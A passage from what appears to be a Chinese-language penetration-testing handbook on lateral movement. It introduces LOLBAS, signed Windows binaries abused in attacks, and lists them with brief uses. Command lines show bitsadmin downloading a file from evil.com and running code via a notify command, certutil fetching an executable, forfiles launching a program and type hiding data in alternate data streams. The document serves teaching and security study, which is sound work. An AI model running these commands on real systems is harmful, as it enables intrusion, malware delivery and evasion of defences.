6.1.5. 横向移动¶
6.1.5.1. 常见入口¶
SMB弱密码
SqlServer弱密码
6.1.5.2. LOLBAS¶
6.1.5.2.1. 简介¶
LOLBAS,全称Living Off The Land Binaries and Scripts (and also Libraries),是一种白利用方式,是在2013年DerbyCon由Christopher Campbell和Matt Graeber发现,最终Philip Goh提出的概念。
这些程序一般有有Microsoft或第三方认证机构的签名,但是除了可以完成正常的功能,也能够被用于内网渗透中。这些程序可能会被用于:下载安全恶意程序、执行恶意代码、绕过UAC、绕过程序控制等。
6.1.5.2.2. 常见程序¶
- appsyncvpublishing.exe
执行powershell
- bitsadmin.exe
下载文件
bitsadmin /transfer <job_name> /priority <priority> <remote_path> <local_path>下载文件
bitsadmin /create 1 bitsadmin /addfile 1 https://evil.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1复制文件
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset代码执行
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
cdb.exe
- certutil.exe
可安装、备份、删除、管理和执行证书
证书存储相关功能
下载文件
certutil -urlcache -split -f https://addr/example.exe注意 certutil 是有cache的,需要显式删除
base64 编解码
certutil -encode/certutil -decode
cmd.exe
cmstp.exe
- control.exe
- csc.exe
编译 C# 载荷
- cscript.exe
执行脚本
extexport.exe
- expand.exe
展开一个或多个压缩文件
- forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
mofcomp.exe
makecab.exe
- msbuild.exe
构建应用程序
- mshta.exe
HTML应用
- msiexec.exe
安装msi
加载dll
- msxsl.exe
处理XSL程序
netsh.exe
- installutil.exe
安装/卸载程序组件
- IEExec.exe
.NET Framework附带程序
powershell.exe
- reg.exe
注册表控制台
- regedit.exe
注册表修改
- regsvr32.exe
注册动态链接库/ActiveX控件
- rundll32.exe
执行DLL文件中的内部函数
- sc.exe
查看服务状态管理
- schtasks.exe
定时计划任务
- shred
重复写入文件,防止文件恢复
- type.exe
利用ads隐藏文件
type <filepath> <target_file:ads>
- wmic.exe
Windows管理工具
windbg.exe
winrm.exe
- wscript.exe
脚本引擎
- waitfor.exe
用于同步网络中计算机,可以发送或等待系统上的信号。